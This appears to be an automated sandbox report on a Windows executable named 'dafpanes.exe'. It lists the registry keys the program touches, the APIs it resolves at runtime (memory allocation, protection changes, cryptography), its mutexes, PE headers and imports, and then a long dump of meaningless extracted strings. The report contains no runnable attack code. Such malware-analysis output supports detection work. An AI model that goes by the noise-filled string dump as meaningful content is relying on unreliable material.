HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASMANCS\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASMANCS\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASMANCS\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASMANCS\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASMANCS\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
kernel32.dll.VirtualAlloc
kernel32.dll.LoadLibraryA
kernel32.dll.GetProcAddress
kernel32.dll.VirtualProtect
kernel32.dll.FreeConsole
kernel32.dll.lstrlenA
kernel32.dll.lstrcmpA
kernel32.dll.GetLastError
kernel32.dll.SetLastError
kernel32.dll.GetCurrentProcessId
kernel32.dll.GetCurrentProcess
user32.dll.wsprintfA
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
oleaut32.dll.#200
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
comctl32.dll.#385
comctl32.dll.#320
comctl32.dll.#324
comctl32.dll.#323
ole32.dll.CreateBindCtx
ole32.dll.CoTaskMemAlloc
ole32.dll.CoGetApartmentType
ole32.dll.CoRegisterInitializeSpy
ole32.dll.CoTaskMemFree
comctl32.dll.#236
oleaut32.dll.#6
ole32.dll.CoGetMalloc
comctl32.dll.#328
comctl32.dll.#334
oleaut32.dll.#2
ole32.dll.CoCreateInstance
setupapi.dll.CM_Get_Device_Interface_List_Size_ExW
setupapi.dll.CM_Get_Device_Interface_List_ExW
comctl32.dll.#332
comctl32.dll.#386
advapi32.dll.InitializeSecurityDescriptor
advapi32.dll.SetEntriesInAclW
ntmarta.dll.GetMartaExtensionInterface
advapi32.dll.SetSecurityDescriptorDacl
advapi32.dll.IsTextUnicode
comctl32.dll.#338
comctl32.dll.#339
shell32.dll.#102
advapi32.dll.OpenThreadToken
propsys.dll.PSLookupPropertyHandlerCLSID
advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryValueExW
advapi32.dll.RegCloseKey
propsys.dll.PSCreatePropertyStoreFromObject
propsys.dll.#417
propsys.dll.PropVariantToStringAlloc
ole32.dll.PropVariantClear
propsys.dll.PSCreateMemoryPropertyStore
propsys.dll.PropVariantToBuffer
propsys.dll.PropVariantToUInt64
propsys.dll.PropVariantToBoolean
propsys.dll.InitPropVariantFromBuffer
advapi32.dll.GetNamedSecurityInfoW
advapi32.dll.TreeSetNamedSecurityInfoW
ole32.dll.CoUninitialize
comctl32.dll.#329
comctl32.dll.#388
comctl32.dll.#321
ole32.dll.CoRevokeInitializeSpy
oleaut32.dll.#500
comctl32.dll.#387
comctl32.dll.#327
advapi32.dll.UnregisterTraceGuids
cryptsp.dll.CryptReleaseContext
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptGenKey
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptDuplicateHash
cryptsp.dll.CryptEncrypt
cryptsp.dll.CryptExportKey
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
rasapi32.dll.RasConnectionNotificationW
sechost.dll.NotifyServiceStatusChangeA
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
iphlpapi.dll.GetAdaptersAddresses
dhcpcsvc.dll.DhcpRequestParams
cryptsp.dll.CryptDecrypt
cryptsp.dll.CryptVerifySignatureW
"C:\Windows\SysWOW64\dafpanes.exe"
PEM9B0
PEMB74
Global\IA4889F95
Global\MA4889F95
PEM1CC
PEMAB0
IESQMMUTEX_0_208
dafpanes
dafpanes

PE Information

Image Base 0x00400000
Entry Point 0x00412ebe
Reported Checksum 0x00000000
Actual Checksum 0x0007d35b
Minimum OS Version 5.0
Compile Time 2019-02-11 13:22:23
Import Hash 2c39de476028b5f0ff38b49f8680c279

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x0001357a 0x00013600 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 3.63
.data 0x00015000 0x00005a28 0x00003c00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 2.89
.idata 0x0001b000 0x0005a386 0x0005a400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.60
.rsrc 0x00076000 0x000004b0 0x00000600 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 2.81
.reloc 0x00077000 0x00000d0c 0x00000e00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ 5.84

Imports

Library OLEAUT32.dll:
0x41b020 VarCyMulI8
Library ADVAPI32.dll:
Library KERNEL32.dll:
0x41b008 GetCalendarInfoEx
0x41b00c GetModuleHandleW
Library USER32.dll:
0x41b038 DdeDisconnectList
0x41b03c GetCursorInfo
0x41b040 TrackPopupMenu
Library SHLWAPI.dll:
0x41b028 StrChrNW
Library msvcrt.dll:
0x41b050 memset
0x41b054 towupper
Library Secur32.dll:
Library WININET.dll:
0x41b048 InternetAutodial

.text
`.data
.idata
@.rsrc
@.reloc
_M=PE
m_p=@
6Z7 $)
z037[
Q G/4
OLEAUT32.dll
GetSidSubAuthorityCount
ADVAPI32.dll
GetModuleHandleW
Wow64SetThreadContext
IsSystemResumeAutomatic
GetCalendarInfoEx
GetLargestConsoleWindowSize
KERNEL32.dll
TrackPopupMenu
GetCursorInfo
DdeDisconnectList
USER32.dll
StrChrNW
SHLWAPI.dll
memset
towupper
msvcrt.dll
InitializeSecurityContextW
Secur32.dll
InternetAutodial
WININET.dll
:L=X=
4"5(5.545:5@5F5L5R5X5^5d5j5p5v5
9,:0:4:
$weww#w$wt$
eeettw$tt#eeettw
#ew#ee$wtet#t#$e
ett#$#et$t$e#w#t
e#e$w#te
t$wwtwe
e$e$#t#
tt#w$ttt
$$w$#$wee
e#et##eeeett#e
$$ttew
tt$$t#tt
ttte$te
ttteww$weettww
w#we#ew##eew$
#ttw#ew$
$#weeweewweetw$t
wtt$t#ee
etetw$tttew#$w$
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!1253452321125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!
!1253452321125345232!1253452321125345232!1253452321125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!
!125345232!
!125345232!125345232!
1125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!1253452321
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!1253452321125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!
!125345232!1253452321125345232!125345232!125345232!
!125345232!125345232!1253452321125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!12534523211253452321125345232!125345232!1253452321125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
$etwt#$$#teett$
t$ee$teewt$#tt
$we$w$$
te$ttewtteeett
wt$tewtt#$wtete
tttt#eet#ewt$$
$et#wteewtt#t
$t$#t#eeee
w#tew$#ew
#tetwtt#t$e
ewe$ew$$tete#tw
#wewt#$
eetwwt#$#et##t
e##et
e$e#tw#
#$$w#t
eett#e
!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!
!1253452321125345232!125345232!125345232!125345232!1253452321125345232!1253452321125345232!125345232!1253452321125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!1253452321125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!1253452321
!125345232!125345232!125345232!125345232!1253452321125345232!125345232!
1125345232!125345232!1253452321125345232!1253452321125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!
!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
#weeet$$#$$t
#e#ttttt#t
$$t$ee#
w$eet$ttte#w
w$e$eww#wt
ww#$$
wt#e$wt
tewt$t$w$t$t$
etewt
tw#$e#
tw$$##eeweetweee
tt$e$w$
tttttw
#wet$wte
ttett#
ew#wwewet
eetet
tewwewwtwtwet
#wee#te#$w$e##
ewettee$
1125345232!125345232!125345232!
!125345232!125345232!125345232!1253452321125345232!125345232!125345232!
!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!
!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
1125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
1125345232!125345232!125345232!125345232!1253452321
1125345232!
!125345232!125345232!1253452321125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!1253452321125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!
!125345232!125345232!125345232!1253452321125345232!125345232!12534523211253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!
eete#$#ttt$
tw$wt$ttte#
wtw$etee
e#ttwttwe$ttte$
ttteewt$
e#tteeweeee#
tttee#ettttee
##tw$$e##tweete
ett#t#wt#t
eweet
wtttet#e
wte#$#tw$e#teetw
wtw$t$ee$$t
e$t$ttt#w##ewe
et#$e#
e$wt$
eew#$tt
ettwettw###e$
wwttet#t#ttte
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!1253452321
!125345232!125345232!125345232!125345232!1253452321125345232!
!125345232!125345232!125345232!1253452321
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!1253452321
!12534523211253452321125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!
!125345232!125345232!1253452321125345232!
eteee$$ee##ee#ew
$tw#ttte
ete$##ee
t#twt$tet
te#e$$e$#wwtwew
tte$ww$twe
$w#te$twwt$#
$ett$e$ettwt
eteeewe$t#
$ew$$$
w$$et
tetwtt#e$
wt$tt#ew$$we#t
tee$#tee
t#$ww#$$we#e$te
#ewe$te$tw
tttt$wt$et
e$#w#ewttw$tt#
1125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
11253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!1253452321125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!1253452321125345232!1253452321125345232!1253452321125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!
1125345232!125345232!1253452321125345232!1253452321
!125345232!1253452321125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!1253452321
1125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!
1125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
11253452321125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
#ee$eetett#wtw#
tw#eee#
tttw$#$$
t#w$eewtwwt$
eee$$w#t$$#$ttwe
e##$e$t$te$t#te
ettteee$
wtw#etewtewe
tet$$$t##$e##t$
e$tte
$wwteeew
tt$$et$te
ew$#e$tee$
eeet#
#ewtt$eww$$wee
w$##$ette
ett##tt
#t#wwee$#wtet#t
twt#tett
teteteetete
wtt#ewetete#t#
!125345232!125345232!1253452321125345232!125345232!1253452321
!1253452321125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!1253452321125345232!125345232!
1125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!
1125345232!125345232!
!1253452321125345232!125345232!125345232!125345232!125345232!1253452321125345232!
!1253452321125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!
!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
e#ttwttt$e$tw#
tteetwe
ee$$tte
#t##t$ettee$tee
t#$#eett#w$##ew
e#$w#$eeetttewt#
t##tett##$$t
ewttw
te$te$$##t
tw#$#e#teeet
e$w$ete
w#tw#t$##wt#
e#$$e
#weeww#ettte
$eete#e
eeetewte#t#
$ttwe#
#$etweee
ew$eet#$
!1253452321125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!
1125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!1253452321125345232!125345232!125345232!
!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!1253452321125345232!
eeet#$
wwtt#et
##ewteee$e$w
ett$w#eewtt#t##
ee$t$$$#ttte
$tt$t$tteewtt$
wteweew
#tetetee$we
teeww#e#wwt$#w
ee$$t$twttteet
t#wwetwetwe
$$t#ttwewee$
et#wteew
wteee#te#t##e
ete$te#et#$
e$eeeetete#ee#w
ee$ew
w$eee$eett$#
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!
1125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!
1125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!12534523211253452321125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!
!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!12534523211253452321
!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!1253452321125345232!125345232!125345232!125345232!125345232!12534523211253452321125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!1253452321125345232!125345232!
ett$t$t
teettw#$w$wt$ee
tt#ww#
e$ee#twet$
t$w##$t#wt
ette#$#e
eeewe#ewwew$et
ett#$wtete#$#
#$wt##te
$$tee#tt#
eew#ete$###
t$$t#we#tettee
tete$et
t#tee#tt
#ee$te
#tt$##$#t#w$
tttettt#we$#eeew
w$twtttte
$wt$ew#
!125345232!125345232!125345232!1253452321125345232!125345232!1253452321125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!1253452321125345232!125345232!125345232!
1125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321
!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321
!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!12534523211253452321
!125345232!125345232!1253452321125345232!125345232!125345232!1253452321125345232!125345232!1253452321125345232!125345232!125345232!
ttewte$te$t$e
w#tw#e$w#e$twtt
e#wtttwetw#ttt
e$#w#tetww$tt
ee$tte
#$tt$$eeee#w
#etwtet
etet##t
t$tt$#eet
etet$###t$e
te#t$wet
ttte$et#w#$tw
e$t$eet
tteewwttet##
twt#ttet#et
eetet#$
e$#tet#$
ttwewet#$$
$e$ewtwtwew
$etweete
ttte$ew$teewew
##$w#e
!1253452321125345232!125345232!1253452321
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!1253452321125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!1253452321
!1253452321125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!
!1253452321125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!
1125345232!125345232!125345232!125345232!125345232!1253452321125345232!
!125345232!125345232!1253452321125345232!125345232!125345232!1253452321125345232!1253452321125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
t#$we#e#
wete#twtt$t$$$e
weeeet$weee
$e#ttett#$etw
ttwteetwewet
##wwt#e
t$ttwwt#e$e$e
t#tee##ee#wewwe#
tw#te$ewt$
$ttt$
e$t#wweew
wtt#et#tt
tewwt#$we
t#$#tet#wewe
#t#wte$et
twtet#$e
twe#e#t#t#t##ee
#te$wtw#w
wtw$ttt#eett$#
#ttttw$e
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321
1125345232!1253452321125345232!1253452321125345232!125345232!125345232!125345232!125345232!
!1253452321
!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!1253452321125345232!125345232!125345232!125345232!
1125345232!125345232!125345232!125345232!1253452321125345232!
!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!1253452321
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!12534523211253452321125345232!125345232!
twtttwtt
e#etteewwtt#tetw
t$#eeewwwe
et#etttee
ee##t$w#t#$eettt
wt$t##twwww#eew
#$ewtt#$te#ttte#
e#et$te#te#t$ttt
$#t$#wt#
tte$#we$#eewew$$
#twt#ttw
eetwetet$$te
t$tetteee
e$$et#$wtt
ttt$$tee$etw
$e#wete
$wtte
#t#t$t
!125345232!125345232!12534523211253452321125345232!1253452321125345232!125345232!
!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!12534523211253452321
!125345232!1253452321125345232!125345232!1253452321125345232!125345232!
1125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321
!125345232112534523211253452321125345232!125345232!1253452321125345232!1253452321125345232!125345232!
!125345232!125345232!1253452321125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321
!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!
t#e$tw
t#etteett##e$$w
et$tt#eettee#et
w##t#twt
eeeteww
e##$$we$ettt$e
#t#ee#ewwwtetw
tt$#e$tet#
et###teett#eet
e$tttwttw
tt$$#weee
e$wt#$w#ee$tte
##we#we
wwww$tet#e#ew#e
$w$##t#w$ewte
!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!12534523211253452321125345232!1253452321
!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!12534523211253452321125345232!125345232!
!1253452321125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!1253452321125345232!125345232!
!125345232!1253452321125345232!125345232!1253452321125345232!125345232!125345232!1253452321125345232!125345232!
#eeweew##ewtt#w
ewwet$teee
wtt$e$$
#e#eew#e
ttttt#wew
etwteew
$$ttt$e
tt$#tt####e#
#te#$$ee$ewete$
wteetett#eewt
eet$tteettt
e##ww$tet
w#w$$e$##$e#te
$etwte#
etettettt$w#
tew#twett#tt$we
eew#tewe
$wteeewt$
!125345232!1253452321125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!12534523211253452321125345232!125345232!125345232!
!125345232!1253452321125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!1253452321125345232!
!1253452321125345232!125345232!125345232!125345232!125345232!
eweeteet##t
$ett#ee#$$ee$eet
e$ee#ew#t
t$##t#e$$e
w$we$twttteee$ww
ee#wew$
#ttew#t#wttte#w
eet$tt
eeee#eew
twee#e#$et$wt
wt#ewet
ett#wt#tee#tt$$
ww#wt#te$###t#t
ww$eeet
$eeewte$w#
$#eeet$$te$t$$
tew$$t$etetw
##weet
eee#ttw
$ee$tttee##etete
ete#wwee
1125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321
!1253452321125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!1253452321125345232!
!12534523211253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!12534523211253452321
!125345232!12534523211253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!1253452321125345232!125345232!125345232!1253452321125345232!
tee#etweew
$etw#weteetee
e$wet$ettte$
ewet#weet#$w$ee
t$tw#twewt$t$$ee
##wtteee$#$wetwt
ew$$ew
te$t#
te#we##
t###w#
weeew#eee
w$tt#tt$w#t#w$e#
teeett$tt$e#e
t#w#wtwt$eewt$t
ew#te$$t#wt
t#wtt
#teew$teteetetw
e$tew#e$twt
!125345232!1253452321125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!
!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!1253452321125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!1253452321125345232!125345232!125345232!125345232!125345232!125345232!1253452321
!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321
1125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321
!125345232!125345232!125345232!1253452321125345232!125345232!
eee#e$$e$
ttttttte$t
tew##et$e
teetwt#
ewtw$wwtettwe
$#ettee$w
$$ew$te
tte#t
tee$$#et$te#e$
ewwtwe##wtt$ewe
$we$$$
eett$t
#e$tw
#e#et
w$et$t$ee
tweew$w#w#ttteew
et#etww
##e$ee#ee$wtt
tt#ee#wtw$
!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!
!125345232!125345232!1253452321125345232!125345232!1253452321125345232!125345232!125345232!125345232!
!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!
11253452321125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321
we#t$tte
$ww##$$$e##ew
w#eeet$e$ett
ttteettew
tetww#ewwte
e#tteeewtee
$$twtee#$eeee
tettwtw
etwte
wtwetwt#etetwtee
w#teew$#$ttt$#
tt$tee$ttwt
tttt$teeet#e
ttttwte
e$$tw
wtttewtttt#e
et$tte$$
eweettt#wt#twt##
ww#t$te$
twtetwtte
#e#w$#t
$we$$#ttetewte
!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!
1125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!
!1253452321125345232!
!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!1253452321125345232!1253452321125345232!125345232!125345232!125345232!1253452321
wtwwtttee$ww$e$w
we#$twtete
eetw$
t$wt$eeewwtt
###te#etwtw
#eteewwtwettw##$
t#ttt$et
#t$tet$tett
ettw$$
#e#ettttet$
e#ww#
#$#wwette
e$#$w$$#e
eeetw$e$tt$wt
teew#
t$e#ew#$e#$$#
teeew#t#
eetwewtew##$t$
!125345232!12534523211253452321125345232!125345232!
!1253452321125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!1253452321125345232!
!125345232!1253452321125345232!125345232!125345232!125345232!125345232!1253452321125345232!1253452321125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!12534523211253452321
!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!1253452321125345232!125345232!
1125345232!125345232!125345232!125345232!125345232!
#eeet#$e#$eewe
ete$etwteet#$w
tt$#ew$
$$ttee#ee
#w##we$we$t
$e$#ee#e$ttt
tee#e$ee
t$w$te#te
ett$#e#eetwww
$tt#e
eeewee
$t$eet#eeet#e
we$$wee##ee$
$$wteet$t$
t#$#$tewt$e$tw#$
ttttt$eee$$#tt
#$t$#t$teeet
eteet#teett
#tee$ttew$
$$$$ewte#$wt
!125345232!125345232!125345232!125345232!125345232!1253452321125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!1253452321
!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!
!1253452321125345232!125345232!125345232!1253452321125345232!125345232!1253452321125345232!125345232!125345232!
!12534523211253452321125345232!125345232!
$#teewe#w
tetweett
ett#twt#$t$tte
e#tt#
$ewwteee$etewe#$
#w###ttttte
tt$tt$#$ewet$
#et#tewt#$$tet
eeeee$wwetee#
w#$tttte
#e#ttew
#eww$#e
wt$wttw$ewtttt
etttte$
e$ttwte$
ete#e$$#e
et#wt
ttw#et
$t$tt$
$eewt$teeet$w#$t
1125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!1253452321125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!1253452321125345232!1253452321125345232!125345232!
